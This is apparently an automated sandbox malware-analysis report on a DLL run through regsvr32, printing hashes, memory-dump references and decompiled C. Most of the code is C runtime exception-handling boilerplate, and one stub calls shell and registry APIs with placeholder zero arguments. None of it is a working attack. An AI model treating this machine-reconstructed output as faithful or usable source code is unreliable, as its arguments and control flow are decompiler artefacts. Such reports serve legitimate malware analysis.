Instruction ID: c138fe460a956138e5cf624669c8ca0b77dcc69e5b30f18620f2126b86c8dbee
Opcode Fuzzy Hash: 77495ca810d11308ac83ad696411e6708062ab295e26d0d451a139b121d62012
Instruction Fuzzy Hash: 4031BA316042059FEF709AB9D810F9A73E9BF00394F10496BE4A9C7790DB72A849CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E457BE3 Relevance: 16.6, APIs: 11, Instructions: 52
registryfilewindowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E457BE3() {
				intOrPtr _t11;
				void* _t12;

				ShellExecuteW(0, 0, 0, 0, 0, 0);
				DragQueryFileW(0, 0, 0, 0);
				StrRChrW(0, 0, 0);
				PathFindExtensionW(0);
				SendMessageW(0, 0, 0, 0);
				CreateSolidBrush(0);
				RegCreateKeyExW(0, 0, 0, 0, 0, 0, 0, 0, 0);
				RegOpenKeyExW(0, 0, 0, 0, 0);
				RegCloseKey(0);
				__imp__CoInitializeEx(0, 0);
				__imp__CoUninitialize();
				_t11 =  *((intOrPtr*)(_t12 + 8));
				return _t11;
			}

0x6e457bef
0x6e457bfd
0x6e457c09
0x6e457c11
0x6e457c1f
0x6e457c27
0x6e457c3f
0x6e457c4f
0x6e457c57
0x6e457c61
0x6e457c67
0x6e457c6d
0x6e4585d4

APIs

ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E457BEF
DragQueryFileW.SHELL32(00000000,00000000,00000000,00000000), ref: 6E457BFD
StrRChrW.SHLWAPI(00000000,00000000,00000000), ref: 6E457C09
PathFindExtensionW.SHLWAPI(00000000), ref: 6E457C11
SendMessageW.USER32(00000000,00000000,00000000,00000000), ref: 6E457C1F
CreateSolidBrush.GDI32(00000000), ref: 6E457C27
RegCreateKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E457C3F
RegOpenKeyExW.ADVAPI32 ref: 6E457C4F
RegCloseKey.ADVAPI32(00000000), ref: 6E457C57
CoInitializeEx.OLE32(00000000,00000000), ref: 6E457C61
CoUninitialize.OLE32 ref: 6E457C67

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: Create$BrushCloseDragExecuteExtensionFileFindInitializeMessageOpenPathQuerySendShellSolidUninitialize
String ID:
API String ID: 353467559-0
Opcode ID: 864d1431164be83c6766a03521b3a5122749b087cfa70fc82636a137484a0cfa
Instruction ID: 6840d30da9c37bc37f4ae3182c51285d8f7ce3f85cbb623bc0cb6c76d755f07d
Opcode Fuzzy Hash: 864d1431164be83c6766a03521b3a5122749b087cfa70fc82636a137484a0cfa
Instruction Fuzzy Hash: 1CF0F7353C8744BBFED07BF4AC0EF687B20AB1AB07F144105F7499C1C08AA024508B55

Uniqueness

Uniqueness Score: -1.00%

Function 6E45C34B Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E6E45C34B(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E6E45D32D(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E6E460332(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_push(_t319);
						_push(_t305);
						_t203 = E6E45C006(_t275, _t279, _t300, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E6E45C006(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E6E45B3A2(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E6E45B2D5(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E6E45C2CB(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E6E460332(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E6E45C006(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E6E45C006(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E6E45C006(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E6E45C006(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E6E45B2D5(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E6E45C2CB(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E6E45B129(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E6E45C006(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E6E45CDC4(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E6E45C006(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E6E45C006(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E6E45C006(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E6E45C006(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E6E45CDC4(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E6E4601FD(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E6E45CA2B( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0x6e474880) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E6E45B129(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E6E45C9D6( &_v64);
											E6E45D3DA( &_v64, 0x6e47255c);
											L63:
											 *(E6E45C006(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E6E45C006(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E6E45B4C8(_t279, _t319, _t274);
											E6E45CCC4(_a8, _a16, _t305);
											_t235 = E6E45CE81(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E6E45CC3B(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}

0x6e45c34b
0x6e45c352
0x6e45c354
0x6e45c35d
0x6e45c363
0x6e45c36b
0x6e45c36d
0x6e45c370
0x6e45c376
0x6e45c6ef
0x6e45c6ef
0x6e45c6f4
0x6e45c6f6
0x6e45c6f8
0x6e45c6fb
0x6e45c6fc
0x6e45c6ff
0x6e45c705
0x6e45c824
0x6e45c70b
0x6e45c70b
0x6e45c70c
0x6e45c70d
0x6e45c714
0x6e45c717
0x6e45c71a
0x6e45c720
0x6e45c722
0x6e45c727
0x6e45c72a
0x6e45c72c
0x6e45c732
0x6e45c734
0x6e45c73a
0x6e45c74f
0x6e45c754
0x6e45c757
0x6e45c759
0x6e45c820
0x00000000
0x6e45c821
0x6e45c759
0x6e45c73a
0x6e45c732
0x6e45c72a
0x6e45c75f
0x6e45c762
0x6e45c765
0x6e45c768
0x6e45c76b
0x6e45c771
0x6e45c783
0x6e45c788
0x6e45c78b
0x6e45c78e
0x6e45c791
0x6e45c794
0x6e45c797
0x6e45c79a
0x00000000
0x00000000
0x6e45c7a0
0x6e45c7a0
0x6e45c7a3
0x6e45c7a6
0x6e45c7b5
0x6e45c7b6
0x6e45c7b6
0x6e45c7b8
0x6e45c7bb
0x00000000
0x00000000
0x6e45c7bd
0x6e45c7c0
0x00000000
0x00000000
0x6e45c7ce
0x6e45c7d0
0x6e45c7d3
0x6e45c7d5
0x6e45c7dd
0x6e45c7dd
0x6e45c7e0
0x6e45c7e2
0x6e45c7e4
0x6e45c800
0x6e45c805
0x6e45c808
0x6e45c808
0x00000000
0x6e45c7e0
0x6e45c7d7
0x6e45c7db
0x00000000
0x00000000
0x00000000
0x6e45c80b
0x6e45c80e
0x6e45c80f
0x6e45c812
0x6e45c815
0x6e45c818
0x6e45c81b
0x6e45c81b
0x00000000
0x6e45c7a6
0x6e45c825
0x6e45c82a
0x6e45c82b
0x6e45c82e
0x6e45c831
0x6e45c832
0x6e45c833
0x6e45c834
0x6e45c837
0x6e45c839
0x6e45c8b1
0x6e45c8b3
0x6e45c8b3
0x6e45c83b
0x6e45c83b
0x6e45c83e
0x6e45c841
0x00000000
0x6e45c843
0x6e45c843
0x6e45c846
0x6e45c849
0x6e45c850
0x6e45c850
0x6e45c853
0x6e45c855
0x6e45c857
0x6e45c889
0x6e45c889
0x6e45c88c
0x6e45c893
0x6e45c893
0x6e45c896
0x6e45c899
0x6e45c8a0
0x6e45c8a0
0x6e45c8a3
0x6e45c8aa
0x6e45c8ac
0x6e45c8ac
0x6e45c8a5
0x6e45c8a5
0x6e45c8a8
0x00000000
0x00000000
0x6e45c8a8
0x6e45c89b
0x6e45c89b
0x6e45c89e
0x00000000
0x00000000
0x6e45c89e
0x6e45c88e
0x6e45c88e
0x6e45c891
0x00000000
0x00000000
0x6e45c891
0x6e45c8ad
0x6e45c859
0x6e45c859
0x6e45c859
0x6e45c85c
0x6e45c85c
0x6e45c85e
0x6e45c860
0x00000000
0x00000000
0x6e45c862
0x6e45c864
0x6e45c878
0x6e45c878
0x6e45c866
0x6e45c866
0x6e45c869
0x6e45c86c
0x00000000
0x6e45c86e
0x6e45c86e
0x6e45c871
0x6e45c874
0x6e45c876
0x00000000
0x00000000
0x00000000
0x00000000
0x6e45c876
0x6e45c86c
0x6e45c881
0x6e45c881
0x6e45c883
0x00000000
0x6e45c885
0x6e45c885
0x6e45c885
0x00000000
0x6e45c883
0x6e45c87c
0x6e45c87e
0x6e45c87e
0x00000000
0x6e45c87e
0x6e45c84b
0x6e45c84b
0x6e45c84e
0x00000000
0x00000000
0x00000000
0x00000000
0x6e45c84e
0x6e45c849
0x6e45c841
0x6e45c8b4
0x6e45c8b8
0x6e45c8b8
0x6e45c385
0x6e45c385
0x6e45c38e
0x6e45c48b
0x6e45c48b
0x6e45c48e
0x00000000
0x6e45c3bd
0x6e45c3bd
0x6e45c3c2
0x00000000
0x6e45c3c8
0x6e45c3c8
0x6e45c3d0
0x6e45c689
0x6e45c68d
0x6e45c3d6
0x6e45c3db
0x6e45c3de
0x6e45c3e3
0x6e45c3ea
0x6e45c3ef
0x00000000
0x6e45c427
0x6e45c42f
0x6e45c493
0x6e45c493
0x6e45c496
0x6e45c499
0x6e45c49b
0x6e45c49e
0x6e45c4a1
0x6e45c4a7
0x6e45c658
0x6e45c658
0x6e45c65b
0x00000000
0x6e45c65d
0x6e45c65d
0x6e45c660
0x00000000
0x6e45c666
0x6e45c666
0x6e45c669
0x6e45c66c
0x6e45c66d
0x6e45c66e
0x6e45c671
0x6e45c672
0x6e45c675
0x6e45c676
0x6e45c67b
0x00000000
0x6e45c67b
0x6e45c660
0x6e45c4ad
0x6e45c4ad
0x6e45c4b1
0x00000000
0x6e45c4b7
0x6e45c4b7
0x6e45c4be
0x6e45c4d6
0x6e45c4d6
0x6e45c4d9
0x6e45c4dc
0x6e45c4e2
0x6e45c4f2
0x6e45c4f7
0x6e45c4fa
0x6e45c4fd
0x6e45c500
0x6e45c503
0x6e45c506
0x6e45c509
0x6e45c50f
0x6e45c50f
0x6e45c512
0x6e45c515
0x6e45c524
0x6e45c525
0x6e45c525
0x6e45c527
0x6e45c52a
0x6e45c530
0x6e45c533
0x6e45c539
0x6e45c53b
0x6e45c53e
0x6e45c541
0x6e45c54a
0x6e45c54d
0x6e45c54f
0x6e45c54f
0x6e45c552
0x6e45c555
0x6e45c558
0x6e45c55b
0x6e45c55e
0x6e45c563
0x6e45c564
0x6e45c565
0x6e45c566
0x6e45c567
0x6e45c56a
0x6e45c56c
0x6e45c56e
0x00000000
0x6e45c570
0x6e45c570
0x6e45c570
0x6e45c573
0x6e45c576
0x6e45c578
0x6e45c579
0x6e45c57e
0x6e45c581
0x6e45c583
0x00000000
0x00000000
0x6e45c585
0x6e45c586
0x6e45c589
0x6e45c58b
0x00000000
0x6e45c58d
0x6e45c58d
0x6e45c590
0x6e45c593
0x00000000
0x6e45c593
0x00000000
0x6e45c58b
0x6e45c5a7
0x6e45c5ad
0x6e45c5ca
0x6e45c5cf
0x6e45c5cf
0x6e45c5d2
0x6e45c5d2
0x00000000
0x6e45c596
0x6e45c596
0x6e45c597
0x6e45c59a
0x6e45c59d
0x6e45c5a0
0x6e45c5a0
0x00000000
0x6e45c5a5
0x6e45c541
0x6e45c533
0x6e45c5d5
0x6e45c5d8
0x6e45c5d9
0x6e45c5dc
0x6e45c5df
0x6e45c5e2
0x6e45c5e5
0x6e45c5e5
0x6e45c5ee
0x6e45c5f1
0x6e45c5f1
0x6e45c509
0x6e45c5f4
0x6e45c5f8
0x6e45c5fa
0x6e45c5fd
0x6e45c603
0x6e45c603
0x6e45c60b
0x6e45c610
0x6e45c67e
0x6e45c67e
0x6e45c683
0x6e45c687
0x00000000
0x00000000
0x00000000
0x00000000
0x6e45c612
0x6e45c612
0x6e45c616
0x6e45c628
0x6e45c62b
0x6e45c62e
0x6e45c630
0x6e45c647
0x6e45c64b
0x6e45c651
0x6e45c652
0x6e45c654
0x00000000
0x6e45c656
0x00000000
0x6e45c656
0x6e45c632
0x6e45c637
0x6e45c63a
0x6e45c63f
0x6e45c642
0x00000000
0x6e45c642
0x6e45c618
0x6e45c61b
0x6e45c61e
0x6e45c620
0x00000000
0x6e45c622
0x6e45c622
0x6e45c626
0x00000000
0x00000000
0x00000000
0x00000000
0x6e45c626
0x6e45c620
0x6e45c616
0x6e45c4c0
0x6e45c4c0
0x6e45c4c7
0x00000000
0x6e45c4c9
0x6e45c4c9
0x6e45c4d0
0x00000000
0x00000000
0x00000000
0x00000000
0x6e45c4d0
0x6e45c4c7
0x6e45c4be
0x6e45c4b1
0x6e45c431
0x6e45c439
0x6e45c43c
0x6e45c441
0x6e45c445
0x6e45c448
0x6e45c44e
0x6e45c451
0x00000000
0x6e45c453
0x6e45c453
0x6e45c456
0x6e45c458
0x6e45c68e
0x6e45c68e
0x00000000
0x6e45c45e
0x6e45c466
0x6e45c471
0x00000000
0x00000000
0x6e45c47a
0x6e45c47d
0x6e45c47e
0x6e45c481
0x6e45c483
0x00000000
0x6e45c489
0x00000000
0x6e45c489
0x00000000
0x6e45c483
0x6e45c45e
0x6e45c693
0x6e45c693
0x6e45c695
0x6e45c696
0x6e45c69d
0x6e45c6a0
0x6e45c6ae
0x6e45c6b3
0x6e45c6b8
0x6e45c6bb
0x6e45c6c0
0x6e45c6c3
0x6e45c6c6
0x6e45c6c8
0x6e45c6ca
0x6e45c6ca
0x6e45c6cf
0x6e45c6db
0x6e45c6e1
0x6e45c6e6
0x6e45c6e9
0x6e45c6ea
0x00000000
0x6e45c6ea
0x6e45c451
0x6e45c42f
0x6e45c3ef
0x6e45c3d0
0x6e45c3c2
0x6e45c38e

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6E45C448
type_info::operator==.LIBVCRUNTIME ref: 6E45C46A
___TypeMatch.LIBVCRUNTIME ref: 6E45C579
IsInExceptionSpec.LIBVCRUNTIME ref: 6E45C64B
_UnwindNestedFrames.LIBCMT ref: 6E45C6CF
CallUnexpected.LIBVCRUNTIME ref: 6E45C6EA

Strings

csm, xrefs: 6E45C3F5
csm, xrefs: 6E45C388
csm, xrefs: 6E45C4A1

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 2901f5f8101c254f9a996eb43488016bce0ac0de232195bcd9ed090ad7ef7fb5
Instruction ID: dc2bc469a0bcc0a79af813f206f5711d879e77cf7fc39dffbcd3ba0652bbf7e6
Opcode Fuzzy Hash: 2901f5f8101c254f9a996eb43488016bce0ac0de232195bcd9ed090ad7ef7fb5
Instruction Fuzzy Hash: 2DB1427180021AAFCF15CFF5C880DAEBBBAAF45318B51496BE8146F315D731DA61CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E460D28 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E460D28(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x6e46d230;
				if(_t68 != 0x6e46d230) {
					E6E4610BE(_t68);
					_t36 = _a4;
				}
				E6E4610BE( *((intOrPtr*)(_t36 + 0x3c)));
